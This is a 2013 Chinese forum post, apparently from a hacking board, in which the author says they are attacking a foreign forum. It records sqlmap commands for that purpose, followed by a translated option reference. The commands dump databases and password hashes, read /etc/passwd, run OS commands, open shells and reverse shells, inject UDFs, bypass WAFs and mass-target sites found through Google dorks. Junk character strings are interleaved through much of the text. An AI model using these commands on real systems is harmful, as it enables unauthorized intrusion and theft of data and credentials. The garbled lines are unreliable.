今天搞国外的一个论坛。发现萝卜和穿山甲都无法正常注入,实在没办法了 还是临时学习了下国外的神器sqlmap的使用方法,,直接做个记录、、" {0 C* k" }9 s: s$ F) h6 K$ w
sqlmap -u “http://url/news?id=1″ –current-user #获取当前用户名称sqlmap -u “http://www.xxoo.com/news?id=1″ –current-db #获取当前数 据库名称
/ E3 f5 j# D/ fsqlmap -u “http://www.xxoo.com/news?id=1″ –tables -D “db_name”#列 表名& F/ o- d7 w r7 F1 f
sqlmap -u “http://url/news?id=1″ –columns -T “tablename”users-D “db_name”-v 0 #列字段+ l8 L$ [) x& K& h" w; H$ w7 c5 a
; H+ `; z( y( ^- s" {$ u
sqlmap -u “http://url/news?id=1″ –dump -C “column_name” -T “table_name”-D “db_name”-v
* P- Y& O8 c W4 `5 z) Q* K% y/ ~+ {0 #获取字段内容& u* h# K7 |: l
0 O3 c7 F! ], O) L
******************信息获取******************
" n5 }( t5 b( {2 m6 msqlmap -u “http://url/news?id=1″ –dbms “Mysql” –users # dbms 指定数 据库类型
- i: E: _: z4 ?6 ^) k+ xsqlmap -u “http://url/news?id=1″ –users #列数据库用户
% J. i5 y9 d7 n T0 T2 ssqlmap -u “http://url/news?id=1″ –dbs#列数据库) w1 Y( p% x* D) {% p: {; k% C
sqlmap -u “http://url/news?id=1″ –passwords #数据库用户密码. f3 Z% M; l2 M: w6 O# h# J
sqlmap -u “http://url/news?id=1″ –passwords-U root -v 0 #列出指定用户 数据库密码
8 v6 g0 y0 t6 a/ G3 dsqlmap -u “http://url/news?id=1″ –dump -C “password,user,id” -T “tablename”-D “db_name”
6 W, n8 _3 W' b" S; ?0 F1 K–start 1 –stop 20 #列出指定字段,列出20 条: i) |1 j1 n5 b8 z- h; @! t% T
sqlmap -u “http://url/news?id=1″ –dump-all -v 0 #列出所有数据库所有表* N' }/ z& p6 M& n1 r8 D4 G
sqlmap -u “http://url/news?id=1″ –privileges #查看权限
# M, E& ~7 h1 D# \' D! I$ t2 Gsqlmap -u “http://url/news?id=1″ –privileges -U root #查看指定用户权限sqlmap -u “http://url/news?id=1″ –is-dba -v 1 #是否是数据库管理员sqlmap -u “http://url/news?id=1″ –roles #枚举数据库用户角色
7 g7 X; T: R3 |. |2 P: q; a3 ksqlmap -u “http://url/news?id=1″ –udf-inject #导入用户自定义函数(获取 系统权限!)
# m( {3 b7 I+ b0 d' Asqlmap -u “http://url/news?id=1″ –dump-all –exclude-sysdbs -v 0 #列 出当前库所有表. y* [ \7 C6 A( y, x
sqlmap -u “http://url/news?id=1″ –union-cols #union 查询表记录
: G& h; c' C& r2 o- k9 K( Lsqlmap -u “http://url/news?id=1″ –cookie “COOKIE_VALUE”#cookie注入
5 N, Z6 C ` `6 J! isqlmap -u “http://url/news?id=1″-b #获取banner信息6 y: a* J4 |8 z2 h- S& B
sqlmap -u “http://url/news?id=1″ –data “id=3″#post注入
4 c, _3 M. A" }' fsqlmap -u “http://url/news?id=1″-v 1 -f #指纹判别数据库类型: \/ _0 b9 V2 _
sqlmap -u “http://url/news?id=1″ –proxy“http://127.0.0.1:8118” #代理注 入, r+ _/ P- e6 R- g6 u. o0 Z
sqlmap -u “http://url/news?id=1″–string”STRING_ON_TRUE_PAGE”# 指 定关键词- S2 {- Y" O# x' a; s/ i
sqlmap -u “http://url/news?id=1″ –sql-shell #执行指定sql命令( l r. Y3 P5 P+ _
sqlmap -u “http://url/news?id=1″ –file /etc/passwd
1 z+ I' M, `) n$ |sqlmap -u “http://url/news?id=1″ –os-cmd=whoami #执行系统命令5 M1 c: Z: ~5 n) k7 E
sqlmap -u “http://url/news?id=1″ –os-shell #系统交互shell sqlmap -u “http://url/news?id=1″ –os-pwn #反弹shell# Z. }8 q- x3 ^3 Z- @" Z1 B
sqlmap -u “http://url/news?id=1″ –reg-read #读取win系统注册表8 c5 v$ S& i$ [( |5 M4 B" i3 C
sqlmap -u “http://url/news?id=1″ –dbs-o “sqlmap.log”#保存进度
' i6 F. s3 N9 I+ Hsqlmap -u “http://url/news?id=1″ –dbs -o “sqlmap.log” –resume #恢复 已保存进度) B+ F7 t* V6 x" {4 ]3 j! m+ K
***********高级用法*************
( `( {! v) r4 ^. _-p name 多个参数如index.php?n_id=1&name=2&data=2020 我们想指定name参数进行注入
5 v' H. m' H3 q8 k) `sqlmap -g “google语法” –dump-all –batch #google搜索注入点自动 跑出 所有字段 需保证google.com能正常访问
K8 f7 G# m+ I6 q; F/ F' o–technique 测试指定注入类型\使用的技术% D5 a+ x. E" |+ p
不加参数默认测试所有注入技术! K) ~) U( C! K+ c2 _. C
• B: 基于布尔的SQL 盲注3 N* g/ X3 X2 I) @6 n/ {" b+ g3 V2 i
• E: 基于显错sql 注入
& ~) n9 K& q8 c, d0 z: R• U: 基于UNION 注入9 {1 ]+ Q8 C% G# q2 D
• S: 叠层sql 注入
7 i- z r0 H! [4 |" l• T: 基于时间盲注
' ~) Q4 @. I4 l, T7 q8 A/ D–tamper 通过编码绕过WEB 防火墙(WAF)Sqlmap 默认用char()
# o$ v* X& l- m( o$ H3 j–tamper 插件所在目录5 P g1 q3 |) T; i& w" d1 d3 v# R
\sqlmap-dev\tamper
% N o" u" i9 w( _! [; Ysqlmap -u “http:// www.2cto.com /news?id=1″ –smart –level 3 –users # smart 智 能
: i) Q3 W% A0 ?: m6 b3 P! elevel 执行测试等级 攻击实例:% K# G1 G& u% m; [$ l
Sqlmap -u “http://url/news?id=1&Submit=Submit”' A& e4 B" b# _6 R! w9 V
–cookie=”PHPSESSID=41aa833e6d0d
+ s) H0 L* l8 d0 ]% k6 t28f489ff1ab5a7531406″ –string=”Surname” –dbms=mysql –user' y2 a, X8 u; z! h$ t& G2 T5 P
–password& a, ^7 S$ D" _/ t2 W
参考文档:http://sqlmap.sourceforge.net/doc/README.html
& q% _( n( ^4 B5 D( A***********安装最新版本*************- }0 s- N' { a& Y P
ubuntu 通过apt-get install 安装的sqlmap版本为0.6 我们通过svn 来安装 为 最新1.0版
' V+ A" d: L2 ~& Ysudo svn checkout https://svn.sqlmap.org/sqlmap/trunk/sqlmap sqlmap-dev* P% r& F2 i0 x2 P: b+ j
安装的位置为:/home/当前用户/sqlmap-dev/sqlmap.py 直接执行/home/当前用户/sqlmap-dev/sqlmap.py –version 这样很不方便 我们可以设置.bashrc 文件
4 ^! F+ T0 b4 ~0 q: j2 k4 Xsudo vim /home/当前用户/.bashrc- n4 p" K- w/ D& F4 \. ? i
#任意位置加上:$ L5 a- j% Y, v. G
alias sqlmap=’python /home/seclab/sqlmap-dev/sqlmap.py’ 该环境变量只对当前用户有效
$ J0 P! K0 J0 b9 q6 L2 H7 E如果想对所有用户有效 可设置全局 编辑下面的文件
4 m9 X4 o6 p: a4 C" Pvim /etc/profile' U& P9 s7 ?( p P' v+ H3 d
同样加上:
- ^! T) F( M6 \4 o, ualias sqlmap=’python /home/seclab/sqlmap-dev/sqlmap.py’ 重启生效$ u6 R4 a& Y: _0 b% D# }) W
******************windows 7 (x64) sqlmap install (SVN)************$ B% x0 q0 R$ N0 [+ T/ l
http://www.python.org/getit/ 安装python9 W& |. z! A/ f* o( `& B' h
http://www.sliksvn.com/en/download 安装windows svn client# B9 V* g3 y" W+ c2 M, D
svn checkout https://svn.sqlmap.org/sqlmap/trunk/sqlmap sqlmap-dev' w( s3 Y' L3 B7 {7 e; R# y
安装sqlmap4 e7 @2 a o" q+ g9 m! T- f) F
*修改环境变量9 E. y, r9 }" E5 C3 N
–version 显示程序的版本号并退出. J5 }/ A. P' k+ F0 a
-h, –help 显示此帮助消息并退出+ v: w$ s3 `2 O b2 h' \! |3 Z
-v VERBOSE 详细级别:0-6(默认为1)
/ _" g% [* U0 S9 p6 C" q7 G( pTarget(目标): 以下至少需要设置其中一个选项,设置目标URL。
' a2 ?( m7 o6 p" o-d DIRECT 直接连接到数据库。% H; {! B- v) u) z% `9 P* t8 [
-u URL, –url=URL 目标URL。4 k4 X; M9 s( e+ K
-l LIST 从Burp 或WebScarab 代理的日志中解析目标。. R+ R. s9 i/ O$ H# ]
-r REQUESTFILE 从一个文件中载入HTTP 请求。
7 f! K. A0 }& L5 `9 Z, }# O-g GOOGLEDORK 处理Google dork 的结果作为目标URL。2 \0 O) O' n: k3 ~/ o
-c CONFIGFILE 从INI 配置文件中加载选项。
. M$ h: }1 y. K' ~Request(请求)::% N1 h7 {: v& ~( n4 n1 B2 c8 P
这些选项可以用来指定如何连接到目标URL。$ S, T/ h% v4 X9 i' k8 q
–data=DATA 通过POST 发送的数据字符串
' {* A' N: i% `–cookie=COOKIE HTTP Cookie 头
: y# H3 D2 i; Y! Y4 r) N" I& s; w–cookie-urlencode URL 编码生成的cookie 注入5 o" j c# H# ?
–drop-set-cookie 忽略响应的Set –Cookie 头信息
. K8 P- r$ C& V- u1 Y7 a 6 l; L+ C! W! b: U0 _% [+ g- q
–user-agent=AGENT 指定 HTTP User –Agent 头
7 o: _- ?+ [; E' |+ ]–random-agent 使用随机选定的HTTP User –Agent 头4 ?7 ]3 P9 h: |; ^) k" A# K6 g
–referer=REFERER 指定 HTTP Referer 头
8 A7 i1 i5 N& Y4 A' m–headers=HEADERS 换行分开,加入其他的HTTP 头+ N8 E7 c% }7 [* n+ ^9 n* T% L- |- H
–auth-type=ATYPE HTTP 身份验证类型(基本,摘要或NTLM)(Basic, Digest or NTLM), ~) O5 I) ]; \" z! |* j
–auth-cred=ACRED HTTP 身份验证凭据(用户名:密码)
- m4 O: ?5 s: d3 @( `–auth-cert=ACERT HTTP 认证证书(key_file,cert_file)4 B5 j0 y- P3 n( w& A# H& ]
–proxy=PROXY 使用HTTP 代理连接到目标URL
* a) k7 X! a) K–proxy-cred=PCRED HTTP 代理身份验证凭据(用户名:密码). J; V% h, o. |/ _4 \) j, S) _6 n0 m6 l
–ignore-proxy 忽略系统默认的HTTP 代理
6 R3 w# J& Q# C7 u8 A- W–delay=DELAY 在每个HTTP 请求之间的延迟时间,单位为秒
! U$ k0 t0 s' R' M0 g" P% C–timeout=TIMEOUT 等待连接超时的时间(默认为30 秒)
0 v% z, \& I, P4 ?: R–retries=RETRIES 连接超时后重新连接的时间(默认3)
* H) r& s$ q; z2 ?; `–scope=SCOPE 从所提供的代理日志中过滤器目标的正则表达式
t0 b' I( }, Q–safe-url=SAFURL 在测试过程中经常访问的url 地址
6 Z9 ?+ K. z$ i/ Z b–safe-freq=SAFREQ 两次访问之间测试请求,给出安全的URL
2 B, m- q! I0 t% ^% O8 V9 AOptimization(优化): 这些选项可用于优化SqlMap 的性能。7 g. m1 S* a9 V% C0 \7 ~
-o 开启所有优化开关9 ^- h& g# R- N/ [
–predict-output 预测常见的查询输出" X, V3 D0 d- a4 H/ j9 E( G
–keep-alive 使用持久的HTTP(S)连接
3 v ]- u' ?7 ? x, ]: I7 g–null-connection 从没有实际的HTTP 响应体中检索页面长度
8 l- x2 D- _: g2 U; h–threads=THREADS 最大的HTTP(S)请求并发量(默认为1)
3 F, S( x" u- t; Z% [# xInjection(注入):
4 `9 P; @ K+ f! L; d+ [+ \这些选项可以用来指定测试哪些参数, 提供自定义的注入payloads 和可选篡改脚本。
' B$ y9 z9 D4 S! K z5 \-p TESTPARAMETER 可测试的参数(S)
: ~ ~' t. W5 I0 q3 j+ C–dbms=DBMS 强制后端的DBMS 为此值
k4 r% _9 K8 k) q# O' \–os=OS 强制后端的DBMS 操作系统为这个值
2 h5 v% A5 A# P: x9 a–prefix=PREFIX 注入payload 字符串前缀1 f, b* J, \* \
–suffix=SUFFIX 注入 payload 字符串后缀
8 L7 W5 M- T2 e0 U s–tamper=TAMPER 使用给定的脚本(S)篡改注入数据, {7 I- n% w, S
Detection(检测):
. y ~. G" L0 Y- |4 s1 C2 r这些选项可以用来指定在SQL 盲注时如何解析和比较HTTP 响应页面的内容。
& b! y7 l% H4 y- G w+ B+ ?+ K) Y–level=LEVEL 执行测试的等级(1-5,默认为1)" |6 |: ?' F4 o
–risk=RISK 执行测试的风险(0-3,默认为1)
2 ]% L! m+ r/ W% B& A–string=STRING 查询时有效时在页面匹配字符串
# P9 J$ W3 q0 D7 ^–regexp=REGEXP 查询时有效时在页面匹配正则表达式: p H3 x8 A& j4 K% `
–text-only 仅基于在文本内容比较网页0 ~" Q6 A" G0 m# Z
Techniques(技巧): 这些选项可用于调整具体的SQL 注入测试。
3 }& |# }/ N" {$ t! G–technique=TECH SQL 注入技术测试(默认BEUST)1 h" B4 o! ?8 q# }& G( M
–time-sec=TIMESEC DBMS 响应的延迟时间(默认为5 秒): I) Y, h e7 q! [# g; o# L
–union-cols=UCOLS 定列范围用于测试UNION 查询注入6 V& W& x7 t/ I' n
–union-char=UCHAR 用于暴力猜解列数的字符
# Z6 E5 v$ q: o- K: S# lFingerprint(指纹):
% C2 X8 H" j3 h' V2 s9 b, q ^-f, –fingerprint 执行检查广泛的DBMS 版本指纹: g1 ]! o1 N( n& @; B: A1 d' u! C, p
Enumeration(枚举): K* i, L5 u6 }. c/ Z; v' D: X
3 Z) c0 S, c; Z9 e/ d5 ~4 @2 d* t( V% ~
这些选项可以用来列举后端数据库管理系统的信息、表中的结构和数据。此外,您还可以运行您自己 的SQL 语句。
# o5 [+ k$ B- ]* Q8 }1 }-b, –banner 检索数据库管理系统的标识
. D$ ?7 f6 c, [' [4 Q, w–current-user 检索数据库管理系统当前用户
7 ?6 o X6 n- j+ Z+ L6 T8 U–current-db 检索数据库管理系统当前数据库0 o5 Z+ U; z5 m x8 ]
–is-dba 检测DBMS 当前用户是否DBA
9 Y* u! _+ G, V% C–users 枚举数据库管理系统用户+ ~- ?1 l# l# V( T) N: \
–passwords 枚举数据库管理系统用户密码哈希
4 m' J7 Y: I0 R0 c( @' K" Q–privileges 枚举数据库管理系统用户的权限
: Z; [% p: }9 C0 V–roles 枚举数据库管理系统用户的角色
' ^" K; {0 x5 D0 t2 S$ r. d–dbs 枚举数据库管理系统数据库& [/ q; O3 [0 @: J
–tables 枚举的DBMS 数据库中的表# J0 d2 Z/ B9 q! V
–columns 枚举DBMS 数据库表列
/ J- I! ?. O8 B7 y0 }–dump 转储数据库管理系统的数据库中的表项- I0 F- S+ I1 u! e; G1 z
–dump-all 转储所有的DBMS 数据库表中的条目4 Z$ w# r' ]1 y
–search 搜索列(S),表(S)和/或数据库名称(S): V7 x& k6 H+ Y3 y# y
-D DB 要进行枚举的数据库名: W0 P5 E$ k$ \9 a: p
-T TBL 要进行枚举的数据库表
# k( D8 d# u* _2 z) {7 o. r9 r-C COL 要进行枚举的数据库列9 t( H7 g1 O0 J8 u" {
-U USER 用来进行枚举的数据库用户
% h( T; |! S/ c–exclude-sysdbs 枚举表时排除系统数据库4 S9 L- w' O b8 A: Q' V& o
–start=LIMITSTART 第一个查询输出进入检索
G) V1 Z/ D6 r; L6 K–stop=LIMITSTOP 最后查询的输出进入检索
) D- `* d# n; R–first=FIRSTCHAR 第一个查询输出字的字符检索; H1 R7 E3 I- F3 _4 v
–last=LASTCHAR 最后查询的输出字字符检索! C6 d) r3 e7 B2 i! I$ v0 j
–sql-query=QUERY 要执行的SQL 语句
7 @2 c+ q' b; E7 `1 l! s–sql-shell 提示交互式SQL 的shell( h) P6 s( k, Z. z$ k; l
Brute force(蛮力): 这些选项可以被用来运行蛮力检查。, o2 g) E* f' R( h3 J; x* Z
–common-tables 检查存在共同表" ~' a/ k2 U, W
–common-columns 检查存在共同列7 q6 y( @" c9 `1 U; e/ J
User-defined function injection(用户自定义函数注入): 这些选项可以用来创建用户自定义函数。6 _, Z) V- C1 N: {& w
–udf-inject 注入用户自定义函数
. w- m P, S0 \7 g5 @2 _9 {& o–shared-lib=SHLIB 共享库的本地路径
5 i" o0 z0 W( K' i- _9 G' V7 D* N% [File system access(访问文件系统): 这些选项可以被用来访问后端数据库管理系统的底层文件系统。
' e+ D6 i1 m5 _, {5 l–file-read=RFILE 从后端的数据库管理系统文件系统读取文件
( a [2 B K+ b; S( H–file-write=WFILE 编辑后端的数据库管理系统文件系统上的本地文件" _; |$ b7 M2 c/ M, _- _- Q3 l
–file-dest=DFILE 后端的数据库管理系统写入文件的绝对路径
- K" G, ~3 v C1 E% [Operating system access(操作系统访问): 这些选项可以用于访问后端数据库管理系统的底层操作系统。
# p! m# @ w' [, J–os-cmd=OSCMD 执行操作系统命令
, U2 {2 V& h( L" c, C–os-shell 交互式的操作系统的shell4 y& a2 y9 H" D l. l# m8 M) P
–os-pwn 获取一个OOB shell,meterpreter 或VNC+ C0 p( X1 @: j6 Z" z" L& d: C% }5 {
–os-smbrelay 一键获取一个OOB shell,meterpreter 或VNC8 U) j8 M8 ~! R
–os-bof 存储过程缓冲区溢出利用
3 j* V3 n8 Z' q. ^, v- [. z* o–priv-esc 数据库进程用户权限提升
7 o+ V% z# ]8 \/ w–msf-path=MSFPATH Metasploit Framework 本地的安装路径- l# J; U8 W& H1 X, v; M
–tmp-path=TMPPATH 远程临时文件目录的绝对路径- @2 p/ }; I0 j: k& [% c
* U2 x$ n1 i. m u- | u
Windows 注册表访问: 这些选项可以被用来访问后端数据库管理系统Windows 注册表。' j7 Z4 X/ y/ N7 j
–reg-read 读一个Windows 注册表项值2 }$ [" H' d+ `5 D* {
–reg-add 写一个Windows 注册表项值数据
+ H' ~; O3 h* Q–reg-del 删除Windows 注册表键值$ W. c( p* J# G
–reg-key=REGKEY Windows 注册表键
) j4 i, k# H6 \. I–reg-value=REGVAL Windows 注册表项值$ ~% I+ x6 M" o, [
–reg-data=REGDATA Windows 注册表键值数据* s3 X+ x* ]9 R0 D4 S
–reg-type=REGTYPE Windows 注册表项值类型
; ?/ e N& Z+ P i) {5 \2 b* |. ^General(一般): 这些选项可以用来设置一些一般的工作参数。6 I$ O9 M0 n! D5 w
-t TRAFFICFILE 记录所有HTTP 流量到一个文本文件中4 h( e8 A% m- P
-s SESSIONFILE 保存和恢复检索会话文件的所有数据2 h5 I! u: J3 h8 Y$ [7 {% R8 z6 \
–flush-session 刷新当前目标的会话文件
$ Z: N' F+ a3 N0 j–fresh-queries 忽略在会话文件中存储的查询结果' f# v+ r& K+ X( ~% H8 T! E
–eta 显示每个输出的预计到达时间
7 R% z% x# R2 o3 j$ d–update 更新SqlMap
+ N1 _$ N# q2 K" B" I–save file 保存选项到INI 配置文件
8 m4 c3 R* X: t9 R–batch 从不询问用户输入,使用所有默认配置。* x' E% }( j# w X
Miscellaneous(杂项):3 w5 b+ M$ ?$ x2 Z4 J
–beep 发现SQL 注入时提醒0 V0 p/ L& m; C- v F9 v
–check-payload IDS 对注入payloads 的检测测试2 f$ W) V h0 N6 K
–cleanup SqlMap 具体的UDF 和表清理DBMS
3 ?/ X& P; t/ a, I2 M: K–forms 对目标URL 的解析和测试形式
M3 r# c- G' f' R7 N& ~! u9 x–gpage=GOOGLEPAGE 从指定的页码使用谷歌dork 结果
3 ]$ j! r7 {- p- h' q( c* n& V–page-rank Google dork 结果显示网页排名(PR). ~, r- p# a0 d
–parse-errors 从响应页面解析数据库管理系统的错误消息+ S9 d( |! V) H3 q5 X# ^
–replicate 复制转储的数据到一个sqlite3 数据库1 V6 j) z0 H: a8 ^. O- `/ r; V
–tor 使用默认的Tor(Vidalia/ Privoxy/ Polipo)代理地址
2 @+ R3 U" a0 S- C3 S' @–wizard 给初级用户的简单向导界面 |
发表于 2013-4-4 22:26:32
收藏
支持
反对